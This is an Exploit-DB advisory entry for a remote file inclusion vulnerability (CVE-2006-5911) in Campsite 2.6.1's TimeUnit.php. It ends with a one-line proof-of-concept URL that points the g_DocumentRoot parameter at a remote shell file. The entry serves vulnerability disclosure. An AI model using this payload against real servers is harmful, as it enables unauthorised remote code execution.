Campsite 2.6.1 TimeUnit.php g_documentRoot Parameter Remote File Inclusion

2007-05-08T00:00:00
ID EDB-ID:29995
Type exploitdb
Reporter anonymous
Modified 2007-05-08T00:00:00

Description

Campsite 2.6.1 TimeUnit.php g_documentRoot Parameter Remote File Inclusion. CVE-2006-5911. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/23874/info
                             
Campsite is prone to multiple remote file-include vulnerabilities.
                             
Exploiting this issue allows remote attackers to execute code in the context of the webserver.
                             
This issue affects Campsite 2.6.1. Earlier versions may also be affected.

http://www.example.com/classes/TimeUnit.php?g_DocumentRoot=shell.txt?